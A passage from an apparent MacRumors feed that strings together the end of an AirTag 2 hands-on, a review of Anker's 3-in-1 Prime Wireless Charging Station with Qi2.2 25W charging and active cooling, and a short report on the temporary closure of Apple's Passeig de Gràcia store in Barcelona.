The AirTag 2 is still priced at $29, with Apple offering a pack of four for $99, so it's a solid deal, especially with the tracking improvements. For most people, it's probably not worth upgrading to an AirTag 2 if you already have an original AirTag, but if you're someone that heavily relies on AirTags on a regular basis, it could be a good idea to pick up a couple of the second-generation versions.
This article, "AirTag 2 Hands-On: What's New and Should You Upgrade?" first appeared on MacRumors.com
The Prime Wireless Charging Station features Qi2.2 support, which lets a compatible MagSafe iPhone charge at up to 25W. It's the same speed as Apple's MagSafe charger, and it is 10W faster than the standard Qi2 MagSafe chargers.
The iPhone 16 and iPhone 17 models are able to fast charge with the Prime Wireless Charging Station, and can get up to a 50 percent charge within 30 minutes. We were able to test the Prime Wireless Charging Station ahead of launch, and it did indeed charge an iPhone 17 Pro Max from dead to 46 percent in a 30-minute period as promised. Wireless charging speeds can vary based on charge level, temperature, and other factors, but the Prime Wireless Charging Station is able to match Apple's native iPhone 17 MagSafe charging options.
Charging speeds are steady thanks to an active "AirCool" feature that keeps the iPhone cool while it's charging. It's meant to ensure the iPhone is below 98.6 degrees Fahrenheit while it's on the charger, and the iPhone 17 Pro Max did feel slightly cooler than when charging with a standard MagSafe charger. The included cooling system is close to inaudible with a tiny fan embedded at the back and a vent at the top, so it's suitable for use on a nightstand or desktop.
It's not clear if the active cooling makes a major difference in all circumstances since we have also been able to get a similar charge in a similar time period with Apple's MagSafe charger, but it could be a useful feature in hotter conditions. The room we tested in was around 68F, while Anker's testing conditions were at 77F. Anker's site suggests the active cooling allows an iPhone 17 to charge 24 percent faster with 30 percent less heat buildup. Anker says the cooling option is also meant to preserve battery health and maintain safety, which is worth considering.
Apple Watches that support fast charging are able to charge at maximum speed, and there is enough power for the AirPods or AirPods Pro. There is a tappable LED for controlling the AirCool feature, which you can tap to turn it on or off. The LED turns blue when the AirCool feature is on, or white when it's off. It'll also turn orange if you connect an incompatible adapter that's below 45W, which is helpful. If you're wanting to use the Prime Wireless Charging Station on your nightstand, you'll be glad to hear that the LEDs turn off after a few seconds so there is no annoying light at night.
The Prime Wireless Charging Station takes up minimal space, thanks to a folding design. The iPhone charges in an upright position with support for StandBy mode, while the pop-up Apple Watch charger is positioned behind with the AirPods charging platform underneath. The Apple Watch charger folds down into the iPhone charger with a hinge that feels durable, and you can press to pop it out. For charging the AirPods, there is an anti-slip pad that has a little AirPods icon for ideal alignment.
The whole thing folds down into a small, palm-sized package that's ideal for travel, measuring in at 3.8 inches by 2.4 inches by 1.2 inches. It's surprisingly light for what it is, similar in weight to the iPhone 17 Pro Max that we tested it with. You can use the iPhone charger with the Charging Station folded up, but you'll need to open it all the way to get to the Apple Watch and AirPods chargers.
The iPhone charging portion works as a stand, and you can change the angle from 0 to 60 degrees without the weight of the iPhone collapsing it down. It works well for watching videos or for FaceTime calls.
Anker includes a 45W power adapter that's needed to get the maximum charging speeds, along with a standard 5-foot USB-C to USB-C cable, which means the charger is ready to go out of the box. It would have been nice to have an integrated cable of some kind to really boost the travel-friendly design, but it's still a compact design that's easy to tuck into a backpack or suitcase. It also looks slick with a gray aluminum design, black magnetic charging surface for the iPhone and AirPods, and matching stabilizing feet at the bottom. The Apple Watch charger is a Made for Apple Watch design, so it's in white.
Anker's charger is designed for the latest iPhone 16 and iPhone 17 models, but it is backwards compatible with all iPhone models, and it also works with all Apple Watch models and all AirPods models. As with all magnetic chargers, if you want to use the charging station with an iPhone case, you'll need a MagSafe-compatible case.
The Prime Wireless Charging Station can be purchased from Amazon or from the Anker website for $120 thanks to a 20 percent launch discount. The price will go up to $150 after the launch promotion.
This article, "Anker's New 3-in-1 MagSafe Charger With 25W Qi2.2 Fast Charging is Now Available for $120" first appeared on MacRumors.com
Apple Passeig de Gràcia
The extent of renovations that will be completed remains to be seen, and Apple has not indicated when the store will reopen to the public.
Apple Passeig de Gràcia first opened in 2012, and it is one of the company's flagship retail locations. The store is on one of the most popular avenues in Barcelona, inside a historic former bank building with a stunning stone facade.
Apple has another store in Barcelona at the Westfield La Maquinista shopping mall.
Thanks, Filip Chudzinski!
This article, "Apple's Beautiful Store in Barcelona Will Be Temporarily Closed Soon" first appeared on MacRumors.com